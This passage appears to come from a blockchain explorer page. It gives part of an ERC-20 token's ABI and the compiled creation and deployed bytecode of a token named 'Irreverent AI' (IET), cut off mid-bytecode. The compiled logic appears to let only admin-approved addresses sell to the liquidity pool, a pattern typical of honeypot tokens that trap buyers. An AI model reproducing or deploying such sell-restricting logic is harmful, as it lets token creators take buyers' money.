me":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"}],"name":"getRoleAdmin","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"grantRole","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"hasRole","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"remPool","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"callerConfirmation","type":"address"}],"name":"renounceRole","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"revokeRole","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

608060405234801561000f575f80fd5b5060405161352e38038061352e83398181016040528101906100319190610874565b838381600690816100429190610b14565b5080600790816100529190610b14565b5050506100675f801b8261029260201b60201c565b506100875f801b61007c61038760201b60201c565b61029260201b60201c565b505f731b02da8cb0d097eb8d57a175b88c7d8b4799750690505f8173ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa1580156100ea573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061010e9190610be3565b73ffffffffffffffffffffffffffffffffffffffff1663c9c653963073fd086bc7cd5c481dcc9c85ebe478a1c0b69fcbb96040518363ffffffff1660e01b815260040161015c929190610c1d565b6020604051808303815f875af1158015610178573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061019c9190610be3565b90508060025f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506001805f60025f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055506102878361026561038e60201b60201c565b600a6102719190610dac565b8661027c9190610df6565b61039660201b60201c565b505050505050610ee0565b5f6102a3838361041b60201b60201c565b61037d5760015f808581526020019081526020015f205f015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff02191690831515021790555061031a61038760201b60201c565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16847f2f8788117e7eff1d82e926ec794901d17c78024a50270940304540a733656f0d60405160405180910390a460019050610381565b5f90505b92915050565b5f33905090565b5f6012905090565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610406575f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016103fd9190610e37565b60405180910390fd5b6104175f838361047e60201b60201c565b5050565b5f805f8481526020019081526020015f205f015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16905092915050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036104ce578060055f8282546104c29190610e50565b9250508190555061059e565b5f60035f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610558578381836040517fe450d38c00000000000000000000000000000000000000000000000000000000815260040161054f93929190610e92565b60405180910390fd5b81810360035f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036105e5578060055f8282540392505081905550610630565b8060035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161068d9190610ec7565b60405180910390a3505050565b5f604051905090565b5f80fd5b5f80fd5b5f80fd5b5f80fd5b5f601f19601f8301169050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b6106f9826106b3565b810181811067ffffffffffffffff82111715610718576107176106c3565b5b80604052505050565b5f61072a61069a565b905061073682826106f0565b919050565b5f67ffffffffffffffff821115610755576107546106c3565b5b61075e826106b3565b9050602081019050919050565b8281835e5f83830152505050565b5f61078b6107868461073b565b610721565b9050828152602081018484840111156107a7576107a66106af565b5b6107b284828561076b565b509392505050565b5f82601f8301126107ce576107cd6106ab565b5b81516107de848260208601610779565b91505092915050565b5f819050919050565b6107f9816107e7565b8114610803575f80fd5b50565b5f81519050610814816107f0565b92915050565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6108438261081a565b9050919050565b61085381610839565b811461085d575f80fd5b50565b5f8151905061086e8161084a565b92915050565b5f805f806080858703121561088c5761088b6106a3565b5b5f85015167ffffffffffffffff8111156108a9576108a86106a7565b5b6108b5878288016107ba565b945050602085015167ffffffffffffffff8111156108d6576108d56106a7565b5b6108e2878288016107ba565b93505060406108f387828801610806565b925050606061090487828801610860565b91505092959194509250565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061095e57607f821691505b6020821081036109715761097061091a565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f600883026109d37fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82610998565b6109dd8683610998565b95508019841693508086168417925050509392505050565b5f819050919050565b5f610a18610a13610a0e846107e7565b6109f5565b6107e7565b9050919050565b5f819050919050565b610a31836109fe565b610a45610a3d82610a1f565b8484546109a4565b825550505050565b5f90565b610a59610a4d565b610a64818484610a28565b505050565b5b81811015610a8757610a7c5f82610a51565b600181019050610a6a565b5050565b601f821115610acc57610a9d81610977565b610aa684610989565b81016020851015610ab5578190505b610ac9610ac185610989565b830182610a69565b50505b505050565b5f82821c905092915050565b5f610aec5f1984600802610ad1565b1980831691505092915050565b5f610b048383610add565b9150826002028217905092915050565b610b1d82610910565b67ffffffffffffffff811115610b3657610b356106c3565b5b610b408254610947565b610b4b828285610a8b565b5f60209050601f831160018114610b7c575f8415610b6a578287015190505b610b748582610af9565b865550610bdb565b601f198416610b8a86610977565b5f5b82811015610bb157848901518255600182019150602085019450602081019050610b8c565b86831015610bce5784890151610bca601f891682610add565b8355505b6001600288020188555050505b505050505050565b5f60208284031215610bf857610bf76106a3565b5b5f610c0584828501610860565b91505092915050565b610c1781610839565b82525050565b5f604082019050610c305f830185610c0e565b610c3d6020830184610c0e565b9392505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b6001851115610cc657808604811115610ca257610ca1610c44565b5b6001851615610cb15780820291505b8081029050610cbf85610c71565b9450610c86565b94509492505050565b5f82610cde5760019050610d99565b81610ceb575f9050610d99565b8160018114610d015760028114610d0b57610d3a565b6001915050610d99565b60ff841115610d1d57610d1c610c44565b5b8360020a915084821115610d3457610d33610c44565b5b50610d99565b5060208310610133831016604e8410600b8410161715610d6f5782820a905083811115610d6a57610d69610c44565b5b610d99565b610d7c8484846001610c7d565b92509050818404811115610d9357610d92610c44565b5b81810290505b9392505050565b5f60ff82169050919050565b5f610db6826107e7565b9150610dc183610da0565b9250610dee7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484610ccf565b905092915050565b5f610e00826107e7565b9150610e0b836107e7565b9250828202610e19816107e7565b91508282048414831517610e3057610e2f610c44565b5b5092915050565b5f602082019050610e4a5f830184610c0e565b92915050565b5f610e5a826107e7565b9150610e65836107e7565b9250828201905080821115610e7d57610e7c610c44565b5b92915050565b610e8c816107e7565b82525050565b5f606082019050610ea55f830186610c0e565b610eb26020830185610e83565b610ebf6040830184610e83565b949350505050565b5f602082019050610eda5f830184610e83565b92915050565b61264180610eed5f395ff3fe608060405234801561000f575f80fd5b5060043610610171575f3560e01c806391d14854116100dc578063bf3b75a311610095578063d547741f1161006f578063d547741f14610433578063d914cd4b1461044f578063dd62ed3e1461046b578063ee4df0e01461049b57610171565b8063bf3b75a3146103dd578063c08ed94a146103f9578063c73bf4231461041757610171565b806391d148541461031b57806395d89b411461034b578063a1293a6d14610369578063a217fddf14610385578063a9059cbb146103a3578063b0f32829146103d357610171565b80632f2ff15d1161012e5780632f2ff15d1461025d578063313ce5671461027957806336568abe146102975780634edd6d8a146102b35780635761e2e7146102cf57806370a08231146102eb57610171565b806306fdde0314610175578063095ea7b31461019357806318160ddd146101c357806323b872dd146101e1578063248a9ca3146102115780632c131d4c14610241575b5f80fd5b61017d6104a5565b60405161018a9190611cb9565b60405180910390f35b6101ad60048036038101906101a89190611d77565b610535565b6040516101ba9190611dcf565b60405180910390f35b6101cb610557565b6040516101d89190611df7565b60405180910390f35b6101fb60048036038101906101f69190611e10565b610560565b6040516102089190611dcf565b60405180910390f35b61022b60048036038101906102269190611e93565b61058e565b6040516102389190611ecd565b60405180910390f35b61025b60048036038101906102569190611d77565b6105aa565b005b61027760048036038101906102729190611ee6565b61064c565b005b61028161066e565b60405161028e9190611f3f565b60405180910390f35b6102b160048036038101906102ac9190611ee6565b610676565b005b6102cd60048036038101906102c89190611f58565b6106f1565b005b6102e960048036038101906102e49190611f58565b61079f565b005b61030560048036038101906103009190611f58565b610803565b6040516103129190611df7565b60405180910390f35b61033560048036038101906103309190611ee6565b610849565b6040516103429190611dcf565b60405180910390f35b6103536108ac565b6040516103609190611cb9565b60405180910390f35b610383600480360381019061037e9190611f58565b61093c565b005b61038d6109bf565b60405161039a9190611ecd565b60405180910390f35b6103bd60048036038101906103b89190611d77565b6109c5565b6040516103ca9190611dcf565b60405180910390f35b6103db6109e7565b005b6103f760048036038101906103f291906120c3565b610a10565b005b610401610b72565b60405161040e9190611ecd565b60405180910390f35b610431600480360381019061042c9190611d77565b610b96565b005b61044d60048036038101906104489190611ee6565b610c38565b005b61046960048036038101906104649190611f58565b610c5a565b005b6104856004803603810190610480919061212f565b610cbe565b6040516104929190611df7565b60405180910390f35b6104a3610d40565b005b6060600680546104b49061219a565b80601f01602080910402602001604051908101604052809291908181526020018280546104e09061219a565b801561052b5780601f106105025761010080835404028352916020019161052b565b820191905f5260205f20905b81548152906001019060200180831161050e57829003601f168201915b5050505050905090565b5f8061053f610d68565b905061054c818585610d6f565b600191505092915050565b5f600554905090565b5f8061056a610d68565b9050610577858285610d81565b610582858585610e13565b60019150509392505050565b5f805f8381526020019081526020015f20600301549050919050565b5f801b6105b681610f0e565b6105be61066e565b600a6105ca9190612326565b826105d59190612370565b5f807f545241444500000000000000000000000000000000000000000000000000000081526020019081526020015f206001015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505050565b6106558261058e565b61065e81610f0e565b6106688383610f22565b50505050565b5f6012905090565b61067e610d68565b73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16146106e2576040517f6697b23200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6106ec828261100b565b505050565b5f801b6106fd81610f0e565b6107277f545241444500000000000000000000000000000000000000000000000000000083610f22565b505f805f7f545241444500000000000000000000000000000000000000000000000000000081526020019081526020015f206001015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505050565b5f801b6107ab81610f0e565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505050565b5f60035f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b5f805f8481526020019081526020015f205f015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16905092915050565b6060600780546108bb9061219a565b80601f01602080910402602001604051908101604052809291908181526020018280546108e79061219a565b80156109325780601f1061090957610100808354040283529160200191610932565b820191905f5260205f20905b81548152906001019060200180831161091557829003601f168201915b5050505050905090565b5f801b61094881610f0e565b5f805f7f545241444500000000000000000000000000000000000000000000000000000081526020019081526020015f206002015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505050565b5f801b81565b5f806109cf610d68565b90506109dc818585610e13565b600191505092915050565b5f801b6109f381610f0e565b600160085f6101000a81548160ff02191690831515021790555050565b5f801b610a1c81610f0e565b5f8490505f8173ffffffffffffffffffffffffffffffffffffffff1663313ce5676040518163ffffffff1660e01b8152600401602060405180830381865afa158015610a6a573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610a8e91906123db565b60ff1690505f5b85518160ff161015610b69575f82600a610aaf9190612406565b86610aba9190612370565b90508373ffffffffffffffffffffffffffffffffffffffff1663a9059cbb888460ff1681518110610aee57610aed612450565b5b6020026020010151836040518363ffffffff1660e01b8152600401610b1492919061248c565b6020604051808303815f875af1158015610b30573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610b5491906124dd565b50508080610b6190612508565b915050610a95565b50505050505050565b7f545241444500000000000000000000000000000000000000000000000000000081565b5f801b610ba281610f0e565b610baa61066e565b600a610bb69190612326565b82610bc19190612370565b5f807f545241444500000000000000000000000000000000000000000000000000000081526020019081526020015f206002015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505050565b610c418261058e565b610c4a81610f0e565b610c54838361100b565b50505050565b5f801b610c6681610f0e565b6001805f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505050565b5f60045f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b5f801b610d4c81610f0e565b5f60085f6101000a81548160ff02191690831515021790555050565b5f33905090565b610d7c83838360016110f4565b505050565b5f610d8c8484610cbe565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610e0d5781811015610dfe578281836040517ffb8f41b2000000000000000000000000000000000000000000000000000000008152600401610df593929190612530565b60405180910390fd5b610e0c84848484035f6110f4565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610e83575f6040517f96c6fd1e000000000000000000000000000000000000000000000000000000008152600401610e7a9190612565565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610ef3575f6040517fec442f05000000000000000000000000000000000000000000000000000000008152600401610eea9190612565565b60405180910390fd5b610efe8383836112c3565b610f0983838361139a565b505050565b610f1f81610f1a610d68565b6115b6565b50565b5f610f2d8383610849565b6110015760015f808581526020019081526020015f205f015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550610f9e610d68565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16847f2f8788117e7eff1d82e926ec794901d17c78024a50270940304540a733656f0d60405160405180910390a460019050611005565b5f90505b92915050565b5f6110168383610849565b156110ea575f805f8581526020019081526020015f205f015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550611087610d68565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16847ff6391f5c32d9c69d2a47ea670b442974b53935d1edc7fd64eb21e047a839171b60405160405180910390a4600190506110ee565b5f90505b92915050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603611164575f6040517fe602df0500000000000000000000000000000000000000000000000000000000815260040161115b9190612565565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036111d4575f6040517f94280d620000000000000000000000000000000000000000000000000000000081526004016111cb9190612565565b60405180910390fd5b8160045f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555080156112bd578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516112b49190611df7565b60405180910390a35b50505050565b60025f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611326576113218282611607565b611395565b60025f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611389576113848382611816565b611394565b6113938382611816565b5b5b505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036113ea578060055f8282546113de919061257e565b925050819055506114ba565b5f60035f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015611474578381836040517fe450d38c00000000000000000000000000000000000000000000000000000000815260040161146b93929190612530565b60405180910390fd5b81810360035f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611501578060055f828254039250508190555061154c565b8060035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516115a99190611df7565b60405180910390a3505050565b6115c08282610849565b6116035780826040517fe2517d3f0000000000000000000000000000000000000000000000000000000081526004016115fa9291906125b1565b60405180910390fd5b5050565b61161082611c27565b156117455760015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16156117075761168e7f545241444500000000000000000000000000000000000000000000000000000083610f22565b50805f807f545241444500000000000000000000000000000000000000000000000000000081526020019081526020015f206001015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550611744565b816040517f96c6fd1e00000000000000000000000000000000000000000000000000000000815260040161173b9190612565565b60405180910390fd5b5b61176f7f545241444500000000000000000000000000000000000000000000000000000083610849565b6118125761179d7f545241444500000000000000000000000000000000000000000000000000000083610f22565b50805f807f545241444500000000000000000000000000000000000000000000000000000081526020019081526020015f206001015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505b5050565b6118225f801b83610849565b611c235760085f9054906101000a900460ff16156119ef57805f807f545241444500000000000000000000000000000000000000000000000000000081526020019081526020015f206002015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054101580156118b757505f81115b156119ad57805f807f545241444500000000000000000000000000000000000000000000000000000081526020019081526020015f206002015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461193691906125d8565b5f807f545241444500000000000000000000000000000000000000000000000000000081526020019081526020015f206002015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055506119ea565b816040517f96c6fd1e0000000000000000000000000000000000000000000000000000000081526004016119e19190612565565b60405180910390fd5b611c22565b805f807f545241444500000000000000000000000000000000000000000000000000000081526020019081526020015f206001015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205410158015611a6c57505f81115b15611b6257805f807f545241444500000000000000000000000000000000000000000000000000000081526020019081526020015f206001015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054611aeb91906125d8565b5f807f545241444500000000000000000000000000000000000000000000000000000081526020019081526020015f206001015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550611c21565b5f81111580611bde5750805f807f545241444500000000000000000000000000000000000000000000000000000081526020019081526020015f206001015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054105b15611c2057816040517f96c6fd1e000000000000000000000000000000000000000000000000000000008152600401611c179190612565565b60405180910390fd5b5b5b5b5050565b5f808273ffffffffffffffffffffffffffffffffffffffff163b119050919050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f611c8b82611c49565b611c958185611c53565b9350611ca5818560208601611c63565b611cae81611c71565b840191505092915050565b5f6020820190508181035f830152611cd18184611c81565b905092915050565b5f604051905090565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f611d1382611cea565b9050919050565b611d2381611d09565b8114611d2d575f80fd5b50565b5f81359050611d3e81611d1a565b92915050565b5f819050919050565b611d5681611d44565b8114611d60575f80fd5b50565b5f81359050611d7181611d4d565b92915050565b5f8060408385031215611d8d57611d8c611ce2565b5b5f611d9a85828601611d30565b9250506020611dab85828601611d63565b9150509250929050565b5f8115159050919050565b611dc981611db5565b82525050565b5f602082019050611de25f830184611dc0565b92915050565b611df181611d44565b82525050565b5f602082019050611e0a5f830184611de8565b92915050565b5f805f60608486031215611e2757611e26611ce2565b5b5f611e3486828701611d30565b9350506020611e4586828701611d30565b9250506040611e5686828701611d63565b9150509250925092565b5f819050919050565b611e7281611e60565b8114611e7c575f80fd5b50565b5f81359050611e8d81611e69565b92915050565b5f60208284031215611ea857611ea7611ce2565b5b5f611eb584828501611e7f565b91505092915050565b611ec781611e60565b82525050565b5f602082019050611ee05f830184611ebe565b92915050565b5f8060408385031215611efc57611efb611ce2565b5b5f611f0985828601611e7f565b9250506020611f1a85828601611d30565b9150509250929050565b5f60ff82169050919050565b611f3981611f24565b82525050565b5f602082019050611f525f830184611f30565b92915050565b5f60208284031215611f6d57611f6c611ce2565b5b5f611f7a84828501611d30565b91505092915050565b5f80fd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b611fbd82611c71565b810181811067ffffffffffffffff82111715611fdc57611fdb611f87565b5b80604052505050565b5f611fee611cd9565b9050611ffa8282611fb4565b919050565b5f67ffffffffffffffff82111561201957612018611f87565b5b602082029050602081019050919050565b5f80fd5b5f61204061203b84611fff565b611fe5565b905080838252602082019050602084028301858111156120635761206261202a565b5b835b8181101561208c57806120788882611d30565b845260208401935050602081019050612065565b5050509392505050565b5f82601f8301126120aa576120a9611f83565b5b81356120ba84826020860161202e565b91505092915050565b5f805f606084860312156120da576120d9611ce2565b5b5f6120e786828701611d30565b935050602084013567ffffffffffffffff81111561210857612107611ce6565b5b61211486828701612096565b925050604061212586828701611d63565b9150509250925092565b5f806040838503121561214557612144611ce2565b5b5f61215285828601611d30565b925050602061216385828601611d30565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806121b157607f821691505b6020821081036121c4576121c361216d565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b600185111561224c57808604811115612228576122276121ca565b5b60018516156122375780820291505b8081029050612245856121f7565b945061220c565b94509492505050565b5f82612264576001905061231f565b81612271575f905061231f565b81600181146122875760028114612291576122c0565b600191505061231f565b60ff8411156122a3576122a26121ca565b5b8360020a9150848211156122ba576122b96121ca565b5b5061231f565b5060208310610133831016604e8410600b84101617156122f55782820a9050838111156122f0576122ef6121ca565b5b61231f565b6123028484846001612203565b92509050818404811115612319576123186121ca565b5b81810290505b9392505050565b5f61233082611d44565b915061233b83611f24565b92506123687fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484612255565b905092915050565b5f61237a82611d44565b915061238583611d44565b925082820261239381611d44565b915082820484148315176123aa576123a96121ca565b5b5092915050565b6123ba81611f24565b81146123c4575f80fd5b50565b5f815190506123d5816123b1565b92915050565b5f602082840312156123f0576123ef611ce2565b5b5f6123fd848285016123c7565b91505092915050565b5f61241082611d44565b915061241b83611d44565b92506124487fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484612255565b905092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b61248681611d09565b82525050565b5f60408201905061249f5f83018561247d565b6124ac6020830184611de8565b9392505050565b6124bc81611db5565b81146124c6575f80fd5b50565b5f815190506124d7816124b3565b92915050565b5f602082840312156124f2576124f1611ce2565b5b5f6124ff848285016124c9565b91505092915050565b5f61251282611f24565b915060ff8203612525576125246121ca565b5b600182019050919050565b5f6060820190506125435f83018661247d565b6125506020830185611de8565b61255d6040830184611de8565b949350505050565b5f6020820190506125785f83018461247d565b92915050565b5f61258882611d44565b915061259383611d44565b92508282019050808211156125ab576125aa6121ca565b5b92915050565b5f6040820190506125c45f83018561247d565b6125d16020830184611ebe565b9392505050565b5f6125e282611d44565b91506125ed83611d44565b9250828203905081811115612605576126046121ca565b5b9291505056fea264697066735822122019065e879137fd7e5f4a9f70134d8d6639df6fdc76625817f25fd02f0f9e435b64736f6c634300081a0033000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000000000000000000000000000000000000005f5e100000000000000000000000000755fa00c24d70ad32f8e42a1d38a2c42d63b3c4e000000000000000000000000000000000000000000000000000000000000000d49727265766572656e742041490000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000034945540000000000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561000f575f80fd5b5060043610610171575f3560e01c806391d14854116100dc578063bf3b75a311610095578063d547741f1161006f578063d547741f14610433578063d914cd4b1461044f578063dd62ed3e1461046b578063ee4df0e01461049b57610171565b8063bf3b75a3146103dd578063c08ed94a146103f9578063c73bf4231461041757610171565b806391d148541461031b57806395d89b411461034b578063a1293a6d14610369578063a217fddf14610385578063a9059cbb146103a3578063b0f32829146103d357610171565b80632f2ff15d1161012e5780632f2ff15d1461025d578063313ce5671461027957806336568abe146102975780634edd6d8a146102b35780635761e2e7146102cf57806370a08231146102eb57610171565b806306fdde0314610175578063095ea7b31461019357806318160ddd146101c357806323b872dd146101e1578063248a9ca3146102115780632c131d4c14610241575b5f80fd5b61017d6104a5565b60405161018a9190611cb9565b60405180910390f35b6101ad60048036038101906101a89190611d77565b610535565b6040516101ba9190611dcf565b60405180910390f35b6101cb610557565b6040516101d89190611df7565b60405180910390f35b6101fb60048036038101906101f69190611e10565b610560565b6040516102089190611dcf565b60405180910390f35b61022b60048036038101906102269190611e93565b61058e565b6040516102389190611ecd565b60405180910390f35b61025b60048036038101906102569190611d77565b6105aa565b005b61027760048036038101906102729190611ee6565b61064c565b005b61028161066e565b60405161028e9190611f3f565b60405180910390f35b6102b160048036038101906102ac9190611ee6565b610676565b005b6102cd60048036038101906102c89190611f58565b6106f1565b005b6102e960048036038101906102e49190611f58565b61079f565b005b61030560048036038101906103009190611f58565b610803565b6040516103129190611df7565b60405180910390f35b61033560048036038101906103309190611ee6565b610849565b6040516103429190611dcf565b60405180910390f35b6103536108ac565b6040516103609190611cb9565b60405180910390f35b610383600480360381019061037e9190611f58565b61093c565b005b61038d6109bf565b60405161039a9190611ecd565b60405180910390f35b6103bd60048036038101906103b89190611d77565b6109c5565b6040516103ca9190611dcf565b60405180910390f35b6103db6109e7565b005b6103f760048036038101906103f291906120c3565b610a10565b005b610401610b72565b60405161040e9190611ecd5